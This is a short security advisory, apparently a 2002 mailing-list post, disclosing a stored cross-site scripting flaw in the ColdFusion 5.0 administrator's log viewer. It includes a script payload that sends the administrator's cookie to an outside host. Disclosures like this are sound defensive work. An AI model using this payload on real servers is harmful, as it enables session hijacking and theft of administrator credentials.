Cross-site scripting vulnerability in CF 5.0

[KiLL CoLe <killcole () yahoo com>]

Cross-site scripting vulnerability in CF 5.0.  This
issue was brought up to macromedia on July 22nd, 2002.
Macromedia issued a fix to me, but I have not seen the
fix available to the public.  the coldfusion
administrator allows you to view your application log
via your web browser.  Under certain conditions, it is
possible to remotely alter coldfusions application
log.  take the following code:

<CFQUERY NAME="qProducts" DATASOURCE="#datasrc#">
   SELECT * FROM Products
   Where ProductId = #int(url.productid)#
</CFQUERY>

if the INT function encounters a value that is not
numeric, it throws an exception and writes the value
that was passed to application.log. Should an
unsuspecting administrator view the log file via their
web browser, script could be executed.  Analyze this
code:
if url.productid (from the above example) were passed
in as:

<iframe name="frame1" width="0" height="0"></iframe>
<script>document.frame1.location="http://www.domain.com/index.cfm?stealcookie=";
+ document.cookie</script>

this would enable an attacker to steal the value of
the coldfusion administrators cookie.  Decrypting the
coldfusion admin's password is well documented, and
exposes a mild-moderate threat to server security.

**NOTE: there are dozens of other functions that throw
exceptions similar to the INT function.

__________________________________________________
Do you Yahoo!?
Yahoo! Mail Plus - Powerful. Affordable. Sign up now.
http://mailplus.yahoo.com